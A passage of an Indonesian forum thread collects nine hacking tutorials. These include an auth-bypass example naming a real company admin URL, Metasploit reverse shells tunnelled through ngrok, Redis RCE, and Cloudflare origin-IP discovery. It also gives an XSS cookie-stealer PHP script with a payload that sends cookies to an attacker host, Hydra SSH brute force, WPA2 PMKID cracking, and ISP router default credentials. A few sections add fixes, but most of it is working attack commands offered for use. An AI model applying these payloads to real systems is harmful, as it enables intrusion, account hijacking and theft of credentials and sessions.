Agen Terpercaya   Advertise
 
 
 
 
Pasang iklan, hanya lewat Contact Us.
Waspada penipuan iklan. Klik di sini untuk melihat daftar penipu.

SHARE Idiot_ _ _ Security_ _ _ _ _ _

RayMantic

Moderator
Staff member
Moderator
Daftar
4 Oct 1988
Post
×
Like diterima
9.055
Bimabet

1. [ cURL ] Celah _No_Redirect_ pada Website :l​



Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contoh Kasus

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php

Sudah paham maksudnya?

Jika masih belum paham, mari simak penjelasan berikut.

Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:

http://shmsupport.telkomsel.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomsel.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL???

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:
Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.
ME59DG3_o.png

Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

Kenapa ini bisa terjadi?

Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:
Code:
if(!isset($_SESSION[user])) {
// lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

How to Fix

Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.
Code:
if(!isset($_SESSION[user])) {
// lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui cURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.


FYI :
Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Situs yg menjadi study kasus sengaja saya samarkan dan saya ganti alamatnya agar tidak di salahgunakan .

Sekian 😐
 
Terakhir diubah:

2 ) [ Shcheck ] Analisa Security Header​



Saat melakukan pentesting aplikasi berbasis web, salahsatu yang harus diperiksa adalah sudah benar atau tidaknya penerapan security pada header website tersebut. Biasanya saya melakukan pengecekan melalui website securityheaders.com dimana output dari website tersebut termasuk yang paling lengkap.

Namun jika kalian lebih prefer menggunakan terminal saat melakukan pengecekan, saya merekomendasikan salahsatu tool dengan fungsi yang sama, yakni :
Github -> https://github.com/santoru/shcheck
memiliki fungsi : untuk memeriksa implementasi security pada header, serta menampilkan output warning jika ada header yang kurang.

Cara Install Shcheck
Berikut beberapa cara instalasi Shcheck:

Menggunakan Pypi
Pastikan python3 dan pip3 sudah terinstall di sistem. Selanjutnya tinggal install shcheck menggunakan command :
Code:
•sudo pip3 install shcheck
•shcheck.py -h

Menggunakan Docker
Pastikan docker sudah diinstall di sistem. Selanjutnya jalankan perintah berikut untuk membuat container dari shcheck.
Code:
•git clone https://github.com/santoru/shcheck
•cd shcheck
•docker build -t shcheck .
•docker run -it --rm shcheck -h

Dari Source
Atau langsung jalankan saja file source shcheck dari repository Github.
Code:
•git clone https://github.com/santoru/shcheck
•cd shcheck
•./shcheck.py -h

Untuk melihat opsi yang tersedia, kalian bisa gunakan flag -h.
Code:
Analisa Security Header pada Website Menggunakan Shcheck
Rabu, 13 Oktober 2021
Analisa Security Header pada Website Menggunakan Shcheck. Saat melakukan pentesting aplikasi berbasis web, salahsatu yang harus diperiksa adalah sudah benar atau tidaknya penerapan security pada header website tersebut. Biasanya saya melakukan pengecekan melalui website securityheaders.com dimana output dari website tersebut termasuk yang paling lengkap.

Namun jika kalian lebih prefer menggunakan terminal saat melakukan pengecekan, saya merekomendasikan salahsatu tool dengan fungsi yang sama, yakni shcheck. Tool yang dibuat oleh santoru menggunakan bahasa Python 3 ini memiliki fungsi untuk memeriksa implementasi security pada header, serta menampilkan output warning jika ada header yang kurang.
Cara Install Shcheck

Berikut beberapa cara instalasi Shcheck:

Menggunakan Pypi

Pastikan python3 dan pip3 sudah terinstall di sistem. Selanjutnya tinggal install shcheck menggunakan command

sudo pip3 install shcheck
shcheck.py -h
Menggunakan Docker

Pastikan docker sudah diinstall di sistem. Selanjutnya jalankan perintah berikut untuk membuat container dari shcheck.

git clone https://github.com/santoru/shcheck
cd shcheck
docker build -t shcheck .
docker run -it --rm shcheck -h
Dari Source

Atau langsung jalankan saja file source shcheck dari repository Github.

git clone https://github.com/santoru/shcheck
cd shcheck
./shcheck.py -h
Untuk melihat opsi yang tersedia, kalian bisa gunakan flag -h.

❰nino❙~❱✔≻ shcheck.py -h
Usage: /usr/local/bin/shcheck.py [options] <target>

Options:
  -h, --help            show this help message and exit
  -p PORT, --port=PORT  Set a custom port to connect to
  -c COOKIE_STRING, --cookie=COOKIE_STRING
                        Set cookies for the request
  -a HEADER_STRING, --add-header=HEADER_STRING
                        Add headers for the request e.g. 'Header: value'
  -d, --disable-ssl-check
                        Disable SSL/TLS certificate validation
  -g, --use-get-method  Use GET method instead HEAD method
  -j, --json-output     Print the output in JSON format
  -i, --information     Display information headers
  -x, --caching         Display caching headers
  -k, --deprecated      Display deprecated headers
  --proxy=PROXY_URL     Set a proxy (Ex: http://127.0.0.1:8080)
  --hfile=PATH_TO_FILE  Load a list of hosts from a flat file
  --colours=COLOURS     Set up a colour profile
  --colors=COLOURS      Alias for colours for US English

Berikut contoh penggunakan shcheck.
Code:
shcheck.py https://blog.linuxsec.org -i -x -k -g
Gambar :
ME59DUT_o.png



Untuk lebih jelasnya YouTube tentang shcheck di sini :


Sekian 😐
 

3) [ Metasploit ] Over Internet Menggunakan Teknik Tunneling.​



ini hanyalah catatan singkat bagaimana kita mengskeploitasi target diluar jaringan menggunakan Metasploit. Untuk teknik tunnelingnya sendiri kita bisa gunakan SSH Tunneling ataupun menggunakan layanan gratis seperti Ngrok.

Menggunakan Ngrok

Pertama, kalian install Ngrok :

Cara Mudah Port Forwarding menggunakan Ngrok​

Oke kali ini mau berbagi sedikit tips buat kalian yang tidak memiliki ip publik dari provider internet yang kalian pakai, kalian bisa menggunakan ngrok sebagai alternatif. Cara penggunaannya pun sangat mudah.

ME59RQX_o.png


Pertama kita download dulu dari web nya. Kenapa gak pake apt-get (buat debian dan turunannya) aja ? Karena di web ngrok kita bisa mendapatkan versi terbaru, sementara yang ada di repository debian dan ubuntu masih versi lawas.
Download Ngrok

Pilih yang sesuai dengan arsitektur OS kalian, 64bit atau 32bit.
Lalu setela didownload masukkan perintah berikut :.
Code:
unzip ngrok-stable-linux-*
chmod +x ngrok
sudo cp ngrok /usr/bin

Cara pemakaiannya gimana?
Bisa kamu cek di perintah help.
Misalnya kita ingin agar localhost kita (server http port 80) dapat dilihat publik. maka masukkan perintah :
Code:
ngrok http 80

Nah, selanjutnya kita coba gimana kalo backconnect. Biasanya yang suka ngeroot server orang butuh nih.
Register dulu disini :
Register Ngrok

Kamu akan mendapatkan auth token di dashboard. Install authtoken tersebut dengan perintah:
Code:
ngrok authtoken xxxxxxxxx

Oke semua sudah disiapkan. Lanjut ke langkah buat back connect.
Kita pakai port 6969 . (ini bebas, boleh pake port mana saja yang gak kepakai).
Code:
ngrok tcp 6969

Setelah statusnya sudah online, kita buka tab terminal lain lalu masukkan perintah
Code:
nc -lvp 6969

Bagaimana dengan sisi server yang ingin di remote ?
Kamu lihat bagian forwarding ngrok nya . SS diatas menunjukkan
Code:
tcp://0.tcp.ngrok.io:17017


Setelah berhasil install kita lanjut ke tutorial .
Disini saya ingin memforward port 4444 di localhost menggunakan Ngrok. Untuk portnya sendiri kalian bisa ubah sesuka hati, disini saya pakai 4444 karena itu merupakan port default TCP handler.
Code:
./ngrok tcp 4444
ME59RXG_o.png

Ok disitu kita sudah dapat IP dan PORTnya yakni 2.tcp.ngrok.io dan 11668.

Nah, di pengaturan payload Metasploitnya, atur LHOST ke 2.tcp.ngrok.io dan LPORT ke 11668. Nah, selanjutnya setting juga ReverseListenerBindAddress ke 127.0.0.1 dan ReverseListenerBindPort ke port yang sudah kita atur di Ngrok sebelumnya, yakni 4444.

Jika seluruh pengaturannya benar, seharusnya request yang dikirim ke Ngrok akan diteruskan ke IP local kita.

Menggunakan VPS

Hampir saya, yang berbeda hanya di langkah awal saja. Tinggal jalankan flag -R untuk remote tunneling dari mesin lokal kita ke VPS.
Code:
ssh -i /home/linuxsec/.ssh/id_rsa -R 4444:127.0.0.1:4444 root@remote-server -p 22

Selanjutnya tinggal sesuaikan LHOST di Metasploit ke IP VPS, dan LPORT ke 4444. Atur juga ReverseListenerBindAddress ke 127.0.0.1 dan ReverseListenerBindPort ke port 4444.


Sekian 😐
 

4) RCE pada Redis via Master-Slave Replication.​



Service Redis yang terekspos ke publik sangat berbahaya karena selain kita bisa melihat informasi yang mungkin sensitif, kita juga bisa melakukan eskalasi untuk mendapatkan shell dan masuk ke sistem.

Ya, yang akan kita bahas disini adalah RCE pada service Redis. Beberapa waktu lalu saya melakukan bug hunting dan menemukan sebuah case dimana layanan Redis yang diinstall terekspos ke publik dan parahnya lagi tidak dipassword. Kebetulan yang digunakan adalah Redis versi 5.x yang memang memiliki celah tersebut. Karena celahnya sendiri sudah ditutup disini saya akan mencoba mendemonsrasikan bagaimana mengeksploitasi serangan tersebut.

Disini saya menggunakan Kali Linux yangmana didalamnya sudah tersedia Metasploit dan modul Redis RCE. Perlu diketahui juga sebelumnya bahwa exploit ini bekerja di Redis versi 4.x dan 5.x. RCE ini sendiri memanfaatkan fitur replikasi Master-Slave yang tersedia di Redis.

How To

Jalankan Metasploit :
Code:
•sudo msfconsole
•use exploit/linux/redis/redis_replication_cmd_exec

Selanjutnya ketik show options untuk melihat opsi apasaja yang tersedia.

Untuk RHOSTS isikan dengan IP target. Untuk RPORT isikan dengan port Redis di target. Namun jika portnya masih default tidak perlu diubah. Untuk SRVHOST isikan dengan IP publik kita. Untuk SRVPORT isikan dengan listen port kita. LHOST isikan dengan IP publik kita.
ME59S43_o.png

Lalu jalankan exploit.
ME59S5O_o.png

Selanjutnya tinggal kita panggil shell saja.
ME59S6B_o.png



Cara Mengamankan Database Redis​

Pertama, kita set password untuk redis, dan pastikan juga redis di bind ke localhost. Secara default perintah perintah di redis server bisa dijalankan tanpa autentifikasi. Jadi siapapun yang sudah masuk ke redis tidak perlu password untuk menjalankan perintah yang ada. Begitu pula redis server ini kadang tidak di bind ke localhost sehingga bisa diakses diluar jaringan. Nah kita set agar redis hanya bisa diakses dari localhost saja.
Code:
sudo nano /etc/redis/redis.conf
Lalu cari
Code:
# requirepass foobared
dan hapus tanda # nya. Selanjutnya ganti foobared dengan password yang kalian kehendaki. Perhatikan peringatan yang ada di direktif requirepass.
Code:
# Warning: since Redis is pretty fast an outside user can try up to
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
#
Sangat jelas. Jadi jika kalian mengunakan password yang lemah, password kalian akan mudah untuk dicrack. Daripada bingung menentukan password yang kuat, kalian bisa meng-generate random password dengan openssl. Contoh perintah:
Code:
openssl rand 66 | openssl base64 -A
Contoh output:
Code:
C017T0II
Konfigurasi menjadi :
Code:
requirepass C017T0II
Masih di /etc/redis/redis.conf, selanjutnya cari :
Code:
# bind 127.0.0.1
Hapus comment atau tanda #. Atau jika memang sudah tidak ada dari awal, tidak perlu diapa apakan.

Oke save. Sekarang restart redis.
Code:
sudo service resdis restart
Selanjutnya cek dengan netstat apakalh local address nya sudah benar 127.0.0.1.
Code:
sudo netstat -plant | grep redis

Jika outputnya seperti dibawah ini berarti konfigurasi sudah benar
Code:
tcp        0      0 127.0.0.1:6379

Jika lain, perlu di cek ulang apakah bind nya sudah benar mengarah ke localhost.

Selanjutnya login ke redis-cli.
redis-cli
Lalu test apakah kita bisa menjalankan perintah tanpa password.
Code:
127.0.0.1:6379> set key1 10(error) NOAUTH Authentication required.
Biasanya error' karena blm memasukan dgn password .password sesuaikan di bagian ini gan .

Oke langkah selanjutnya adalah menghapus atau merename beberapa perintah berbahaya sehingga tidak menggunakan perintah default. Perintah berbahaya sendiri meliputi perintah berikut:
FLUSHDB, FLUSHALL, KEYS, PEXPIRE, DEL, CONFIG, SHUTDOWN, BGREWRITEAOF, BGSAVE, SAVE, SPOP, SREM, RENAME, dan DEBUG
Code:
sudo nano /etc/redis/redis.conf

Lalu untuk rename tinggal ubah ke perintah baru. Sementara untuk menghapus atau mendisable cukup ubah ke empty string yang ditandai dengan tanda petik dua sebanyak dua kali. Kalo bingung lihat contoh berikut:
Code:
. . .
# It is also possible to completely kill a command by renaming it into
# an empty string:
#
rename-command FLUSHDB ""
rename-command FLUSHALL ""
rename-command DEBUG ""
. . .
. . .
rename-command CONFIG ""
rename-command SHUTDOWN shutd0wn
rename-command CONFIG c0nf1g
. . .

Sesuaikan sendiri ya untuk perintah mana yang akan dihapus maupun direname. Selanjutnya restart redis.

Sekarang kita test.
Code:
127.0.0.1:6379> config get requirepass
Output:
Code:
(error) ERR unknown command 'config'
Yep, karena sudah kita rename. Sekarang coba lagi dengan perintah yang baru:
Code:
127.0.0.1:6379> c0nf1g get requirepass
Output:
Code:
1) "requirepass"
2) "Vk6OEWmDWmR5OCMt56rygp5WKrze14yDE..."


Refrensi :
https://www.digitalocean.com/commun...ecure-your-redis-installation-on-ubuntu-18-04


Sekian 😐
 

5) Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback.​



Ada banyak cara yang bisa dilakukan untuk menemukan IP dibalik Cloudflare. Yang paling lazim digunakan adalah menggunakan DNS history. Namun jika website tersebut memiliki fungsi Pingback XMLRPC, misalnya WordPress, kita bisa memanfaatkan service tersebut untuk mengetahui IP dibalik Cloudflare.

Sebelum memulai tutorial ini, pastikan kalian juga memiliki satu buah VPS atau server yang sudah terinstall webserver.

Pertama, kita cek A record dari web target.
ME59SQQ_o.png

Terlihat dari screenshot diatas bahwa web tersebut menggunakan Cloudflare.

Oke, selanjutnya kita cek apakah website tersebut memiliki fungsi ping di XMLRPCnya. Di WordPress, kalian bisa melakukan post request ke file xmlrpc.php

Berikut request yang dikirim untuk melihat seluruh method yang bisa digunakan.
Code:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
ME59SUT_o.png


Jika method pingback.ping tersedia, kita bisa lanjut.

Selanjutnya kita login ke server kita, dan pantau access log ke web server.
Contoh :
Code:
tail -f /var/log/nginx/access.log | grep cloudflare_bypass
Selanjutnya kita balik lagi ke web target. Buat request dengan method pingback.ping. Formatnya :
Code:
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://ip_server_kita/cloudflare_bypass</string>
</value>
</param>
<param>
<value>
<string>http://webtarget.com/postingan-artikel/</string>
</value>
</param>
</params>
</methodCall>
Jadi di web target harus ada artikel valid yang bisa kita gunakan untuk melakukan pingback. Untuk IP server kita, maksudnya adalah IP server VPS yang kita miliki. Pastikan juga web servernya sudah diaktifkan sehingga kita bisa cek log akses nya.

Contoh request dan respon nya di Burp Suite.
ME59SX8_o.png

Dan di log access VPS kita, yang tercatat adalah IP asli web target, bukan lagi IP Cloudflare.
ME59T1B_o.png



Sekian 😐
 

6) Memanfaatkan Bug XSS untuk Mencuri Cookie .​



Kalian mungkin bertanya-tanya kenapa para bug hunter yang berhasil menemukan celah XSS selalu diberi hadiah besar. Kalian mungkin berpikir bahwa celah XSS hanyalah celah sepele yang tidak berdampak ke server secara langsung. Namun taukah kamu, jika bug ini bisa disalahgunakan untuk tidakan yang lebih parah, misalnya dimanfaatkan untuk mencuri cookie. Setelah berhasil mencuri cookie biasanya attacker bisa memanfaatkan cookie tersebut misalnya login ke akun korban tanpa perlu menggunakan password, dll.

Mempersiapkan Cookie Stealer

Siapkan sebuah server yang berisi script PHP dengan konten dibawah ini:
Code:
<?php
header ('Location:https://google.com');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
?>

Simpan dengan nama bebas, asalnya berekstensi php. Sebagai contoh disini saya simpan dengan nama steal.php. Untuk lokasi redirectnya, disini saya arahkan ke Google agar lebih mudah membedakan saja. Di real case kalian bisa mengubahnya dengan halaman website yang memiliki celah, agar korban tidak curiga.

Disini saya jalankan cookie stealer diatas menggunakan PHP built in web server .

Cookie Stealing

Untuk proses cookie stealing ini saya menggunakan DVWA yang kebetulan juga memiliki form untuk XSS attack.
Ini contoh cookie yang akan kita curi: PHPSESSID=cqrg1lnra74lrug32nbkldbug0; security=low

Contoh payload yang digunakan:
Code:
<script type="text/javascript">
document.location='http://172.17.0.1:1337/steal.php?c='+document.cookie;
</script>

Tentu saja ini hanyalah payload sederhana yang harus kalian modifikasi agar sesuai. Setelah dieksekusi, korban akan diarahkan ke Google (karena kita setting lokasi redirect nya ke Google).

Dan di server tempat kita memasang cookie stealer, cookie milik korban akan tertangkap.

Cookie juga akan tersimpan di file log.txt


Sekian 😐
 

7) Cracking Password SSH menggunakan Hydra di Kali Linux​



membahas seputar password cracking. Ya, kita akan membahas bagaimana membobol password SSH untuk kemudian bisa kita gunakan untuk login ke server.

Tool hydra sendiri source code nya tersedia di GitHub, namun paket nya sudah tersedia di Debian dan turunannya dan bisa diinstall menggunakan apt. Di tutorial ini saya menggunakan Kali Linux, dan tool ini sudah tersedia di dalamnya.

Sebagai contoh disini saya ingin melakukan brute force terhadap user root. Sebenarnya login root menggunakan password sendiri sudah disable secara default, namun masih banyak sysadmin yang ceroboh dengan malah mengijinkan pengguna login sebagai root menggunakan password.

Contoh attacking user SSH :
Code:
hydra -l root -P ~/wordlists.txt 172.17.0.2 -s 22 -t 4 ssh
Keterangan :
  • -l diisi dengan username yang ingin diserang.
  • -P berisi file wordlist. Sesuaikan sendiri untuk path file nya
  • -s merupakan port dari service yang berjalan. Di contoh ini menggunakan default port SSH 22, namun tidak menutup kemungkinan portnya sudah diganti.
  • -t merupakan task atau koneksi pararel. Kita batasi saya sampai 4 karena biasanya dari SSH service nya juga dibatasi.
Kalian juga bisa melakukan mass cracking dengan menggunakan list IP dan juga usernamenya. Contoh:
Code:
hydra -L ~/username.txt -P ~/password.txt -M ~/ip.txt -s 22 -t 4 ssh


Sekian 😐
 

8) Hack WiFi: Cracking Password WPA2 dengan PMKID Attack​



Metode cracking WPA2 saat ini lebih mudah setelah ditemukannya teknik PMKID attack dimana kita tidak lagi membutuhkan proses handshake dari jaringan WiFi yang ingin diserang. Itu artinya bahkan meskipun di SSID tersebut sedang tidak ada yang login, kalian tetap bisa melakukan dump PMKID dari router yang menggunakan keamanan WPA2, yang kemudian kita bisa melakukan cracking dari informasi yang didapat tersebut.

Metode ini ditemukan oleh Jens ‘Atom’ Steube, orang dibalik tool cracking populer, Hashcat. Menurutnya, metode ini akan efektif terhadap hampir seluruh router yang menggunakan jaringan 802.11i/p/q/r dengan fungsi roaming diaktifkan.

Oke pertama, kita install dependensi yang dibutuhkan terlebih dahulu.
Code:
sudo apt-get update
sudo apt-get install git libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev

Selanjutnya install hcxtool
Code:
cd /tmp
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
sudo make install
Code:
cd /tmp
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install

Selanjutnya adalah instalasi hashcat. Di distro pentest seperti Kali Linux atau BackBox, tool ini sudah ada di repository dan dapat diinstall menggunakan perintah
Code:
sudo apt-get update && sudo apt-get install hashcat

Namun jika kalian tidak menemukan hashcat di repository, kalian bisa download melalui link berikut:
https://github.com/hashcat/hashcat

Oke lanjut ke proses hack WiFi.

Masuk ke mode monitor terlebih dahulu. Sebelumnya, kalian periksa dulu nama interface network kalian dengan perintah
Code:
ifconfig

Masuk ke mode monitor dengan command
Code:
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Sekarang kita gunakan hcxdumptool untuk menyerang PMKID dari SSID yang rentan.
Code:
sudo hcxdumptool -i wlan0 -o pwn.pcapng --enable_status=1
Code:

Jika PMKID sudah ditemukan, kalian bisa hentikan proses dengan menekan Ctrl+ C.

Lanjut, kita convert file pcapng agar bisa dicrack menggunakan hashcat.
Code:
hcxpcaptool -z pwn.16800 pwn.pcapng

Terakhir adalah proses cracking menggunakan hashcat.

Di real case mungkin kalian bisa menggunakan brute force dengan mencoba seluruh kombinasi karakter 8 digit
Code:
sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Atau, kalian bisa juga menggunakan password list untuk melakukan dictionary attack. List password kalian bebas mau ambil darimana, namun rekomendasi saya adalah ini:

Jika sudah didownload, jalankan command
Code:
sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 --force 'wifi-password.txt'


cara kedua :

menggunakan Wifite​

lebih simple dari itu yakni dengan menggunakan Wifite. Kelebihan Wifite karena setelah mendeteksi keberadaan SSID, dia akan mencoba seluruh teknik wifi hacking yang sesuai. Misalnya SSID tersebut menggunakan WPS, maka Wifite akan mencoba melakukan PIN attack, begitu seterusnya sampai ketemu metode yang cocok.

Untuk OS nya kalian bebas mau pakai apa asal masih Linux, namun direkomendasikan untuk menggunakan distro pentest agar tidak ribet install dependensi sana sini.

Install Dependensi

Agar seluruh fungsi dari Wifite bekerja sempurna, pastikan tool pendukungnya terinstall semua.
Code:
sudo apt-get update
sudo apt-get install git libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev build-essential aircrack-ng

install hcxtool
Code:
cd /tmp
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
sudo make install

Install Pixiewps
Code:
cd /tmp
git clone https://github.com/wiire/pixiewps
cd pixiewps*/
make
sudo make install

Install Reaver
Code:
cd /tmp
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x*
cd src
./configure
make
sudo make install

Di Baxkbox hanya itu yang perlu diinstall (atau diupdate). Untuk dependensi lain bisa kalian cek disini:

https://github.com/derv82/wifite2#required-tools

Wifite sendiri sudah terinstall di Backbox dan Kali Linux, namun jika di sistem kalian belum terinstall, gunakan perintah berikut untuk menginstall Wifite 2.
Code:
git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install


Default Password Modem ZTE F670L Indihome Terbaru

Code:
user : user
pass : user

Default Password Router Huawei HG8245H5 Indihome Terbaru

Dan berikut beberapa list default credentials yang bisa kalian gunakan.
Code:
username : telecomadmin
password : admintelecom

username : admin
password : admin

username : Support
password : theworldinyourhand

username : Support
password : zep2kjzol

Username : telecomadmin
Password : zep2kjzol

user : Admin
pass : admin

*

CATATAN

Kredensial yang bisa digunakan tidak sama di setiap daerah. Bisa saja user telcomadmin work di daerah Semarang, tapi tidak di daerah Surabaya. Dan yang work di Gresik admin. Jadi kasusnya tidak selalu sama.


sekian 😐
 

9) Sniffing pada Form Upload Gambar.​



Bug semacam ini marak terjadi di tahun 2019 dan banyak di manfaatin defacer untuk tebas index namun pada saat ini masih saja terjadi pada dev besar. Kenapa ? (Tidak menjadi sebuah pembelajaran dan pengalaman untuk memperhatikan sistem) .apa bug ini masih di anggap tidak begitu berbahaya atau memang mudahnya cara patcing nya hingga di sepelekan .

Oke kali ini saya akan membahas mengenai cara mengeksploitasi form upload pada sebuah web sehingga memunculkan XSS. Kita bisa memodifikasi request saat melakukan upload (mirip seperti tamper data), hanya saja nantinya yang kita modifikasi adalah mime type nya.

Saya menemukan bug ini pada salahsatu marketplace besar di Indonesia. Namun ketika saya laporkan bugnya, ternyata duplicate. Tapi kampangnya, meski duplicate bug nya masih saya tidak dipatch, padahal kalau dihitung hitung sudah sekitar dua bulan yang lalu saya lapor. Berarti (jika memang bug tersebut duplicate), pihak security marketplace lebih dari dua bulan sudah mengetahui bug tersebut terhitung dari pelapor pertama.

Oke karena mungkin pihak marketplace tersebut tidak menganggap ini sebagai bug, saya sharing saja disini bagaimana PoC nya.

Pertama, kita butuh tool imagemagick.
Ini untuk menyisipkan payload XSS kita kedalam gambar. Intinya, payload disini tidak bisa langsung disisipkan kedalam gambar dengan cara kita membuka file gambar dengan teks editor, menambahkan script XSS di paling bawah, kemudian menyimpan gambarnya kembali. File gambar tersebut akan terdeteksi sebagai file corrupt saat diupload.

Oke balik lagi ke topik, pertama, kita harus menyediakan gambar “murni” yang akan kita sisipi payload. Murni disini dalam artian gambar tersebut masih bersih tanpa ada inject payload didalamnya.

Di Debian dan Ubuntu serta turunannya, gunakan perintah :
Code:
sudo apt-get update && sudo apt-get install imagemagick

Selanjutnya kita sisipkan payload kita kedalam gambar dalam bentuk comment.
Code:
wget https://websayaexploid.org/wp-content/uploads/2021/12/ray.jpg
Code:
convert sagiri.jpg -set comment '<script>alert(document.domain);</script>' helloworld.jpg
Code:
mv helloworld.jpg helloworld.jpg.html

Selanjutnya kita upload file helloworld.jpg.html tersebut lewat form upload.

Sebelumnya, kita siapkan juga burp suite .atau apapun itu yang bisa digunakan untuk memodifikasi request. Namun disini saya menggunakan Burp. Kita ubah ekstensi gambar dari html ke jpg. Namun biarkan content-type tetap text/html.

Ubah ekstensi file nya
Jika memang web nya vuln, maka gambar akan sukses terupload. Dan jika diakses, script XSS akan muncul.dan typenya html.


sekian😐
 

1. [ cURL ] Celah _No_Redirect_ pada Website :l​



Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contoh Kasus

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php

Sudah paham maksudnya?

Jika masih belum paham, mari simak penjelasan berikut.

Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:

http://shmsupport.telkomsel.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomsel.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL???

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:
Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.
ME59DG3_o.png

Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

Kenapa ini bisa terjadi?

Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:
Code:
if(!isset($_SESSION[user])) {
// lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

How to Fix

Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.
Code:
if(!isset($_SESSION[user])) {
// lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui cURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.


FYI :
Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Situs yg menjadi study kasus sengaja saya samarkan dan saya ganti alamatnya agar tidak di salahgunakan .

